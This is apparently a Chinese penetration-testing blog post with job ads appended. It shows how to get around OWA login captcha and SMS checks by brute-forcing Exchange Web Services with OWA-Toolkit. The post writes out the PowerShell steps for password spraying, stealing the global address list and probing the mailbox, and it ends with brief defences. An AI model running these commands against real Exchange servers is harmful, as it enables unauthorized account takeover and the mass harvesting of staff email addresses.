声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
前言
通常遇到Microsoft Exchange Outlook web app站点,默认不会增加爆破限制,通过Burp Suite进行枚举爆破测试,获得账号和密码。
但在某种环境中,Microsoft Exchange Outlook web app进行二次开发,增加验证码或是短信口令、动态口令等登录限制。
如下图所示:
如果存在EWS/Exchange.asmx接口,弹出提示框,需要进行身份验证。
什么是OWA-Toolkit
大多数情况下,遇到上述验证码或是手机二次验证情况,束手无策,没有思路去进行一步测试,下面给出一种绕过限制的解决方法。
通过OWA-Toolkit包括几个大的功能点,其中最重要的是Burte-EWS和Steal-GAL、OTK-Init模块,当使用Burte-EWS进行枚举爆破,获取爆破成功对应账号和密码,并可深入利用Steal-GAL或OTK-Init模块进行全局地址获取,读取出所有人员邮箱地址,以便进一步深入测试。
Burte-EWS模块:
Brute-EWS模块基于多线程的PowerShell脚本暴力破解Exchange Web Service。
Steal-GAL模块:
Steal-GAL模块基于PowerShell用于枚举和复制邮件系统全局地址列表(GAL)。
OTK-Init模块:
OTK-Init模块基于cmd-let处理Exchange Web Service对象,利用微软提供的Exchange Web Service API与Exchange Web服务进行交互。
利用Exchange ews接口进行爆破,需要使用到两个软件,一个是Exchange Web Service API接口客户端。
下载地址:https://download.microsoft.com/download/8/2/5/825231AC-D373-45D4-A644-7AF12340C815/EwsManagedApi.msi。
另一个是OWA-Toolkit。
下载地址:https://github.com/johnnyDEP/OWA-Toolkit。
如何使用OWA-Toolkit进行枚举爆破测试
1.由于OWA-Toolkit需要在powershell环境中运行,需要先解除powershell默认脚本执行限制
PS C:WINDOWSsystem32>Get-ExecutionPolicy
PS C:WINDOWSsystem32>Set-ExecutionPolicy RemoteSigned
2.导入OWA-Toolkit.psm1,这里为了方便将脚本修改为test.psm1
PS C:WINDOWSsystem32>import-module test -verbose
3.获取模块命令
PS C:WINDOWSsystem32>get-command -module test
4.在使用 OWA-Toolkit 时,如果出现如下错误提示
"You need to install the Exchange Web Service API or check your Microsoft.Exchange.WebServices.dll path"
将Exchange Web Service API 安装文件中的Microsoft.Exchange.WebServices.dll放至
C:Program FilesMicrosoftExchangeWeb Services2.1Microsoft.Exchange. WebServices.dll(OWA-Toolkit.psm1文件中已对dll路径进行声明)
5.并指定dllpath
$dllPath = "C:Program FilesMicrosoftExchangeWebServices2.1Microsoft.Exchange.WebServices.dll"
6.再使用Get-OWAVersion版本信息
Get-OWAVersion https://email.xx.com
7.进行爆破测试
Brute-EWS -TargetList test.txt -ExchangeVersion 2010_SP1 -ewsPath "https://email.domain.com/EWS/Exchange.asmx" -Password "123456" -Domain "domain.com"
8.获取全局地址
Steal-GAL -Password "123456" -User "test" -domain "domain.com" -ExchangeVersion 2010_SP1
9.进行邮箱系统信息探测
OTK-Init -Password "123456" -User "test" -domain "domain.com" -ExchangeVersion 2010_SP1
防御方案
2.增加限制对页面EWS/Exchange.asmx访问
3.关闭外网开放web app登录页面
4.增加页面动态口令验证、手机验证等二次校验手段
招聘启事
————————
公司:安恒信息
岗位:Web安全 安全研究员
部门:安服战略支援部
薪资:13-30K
工作年限:1年+
工作地点:杭州(总部),广州
岗位剩余编制:3人
工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…
【岗位优势】
部门不背业绩,部门不背业绩,部门不背业绩;以红蓝技术为导向;
【岗位职责】
1.定期面向部门、全公司技术分享;
2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;
3.负责完成部门渗透测试、红蓝对抗业务;
4.负责自动化平台建设
5.负责针对常见WAF产品规则进行测试并落地bypass方案
【岗位要求】
1.至少1年安全领域工作经验;
2.熟悉HTTP协议相关技术
3.拥有大型产品、CMS、厂商漏洞挖掘案例;
4.熟练掌握php、java、asp.net代码审计基础(一种或多种)
5.精通Web Fuzz模糊测试漏洞挖掘技术
6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法
7.有过独立分析漏洞的经验,熟悉各种Web调试技巧
8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)
【加分项】
1.具备良好的英语文档阅读能力;
2.曾参加过技术沙龙担任嘉宾进行技术分享;
3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;
4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;
5.开发过安全相关的开源项目;
6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;
7.个人技术博客;
8.在优质社区投稿过文章;
简历投递至 [email protected]
PS:邮件主题中请注明工作意向城市,岗位要求可通过加分项弥补
设计招聘
————————
【职位描述】
负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。
【职位要求】
1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;
2、有良好的美术功底,审美能力和创意,色彩感强;精通photoshop/illustrator/coreldrew/等设计制作软件;
3、有品牌传播、产品设计或新媒体视觉工作经历;
【关于岗位的其他信息】
企业名称:杭州安恒信息技术股份有限公司
办公地点:杭州市滨江区安恒大厦19楼
学历要求:本科及以上
工作年限:1年及以上,条件优秀者可放宽
专注渗透测试技术
全球最新网络攻击技术
END
---
------
---------
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论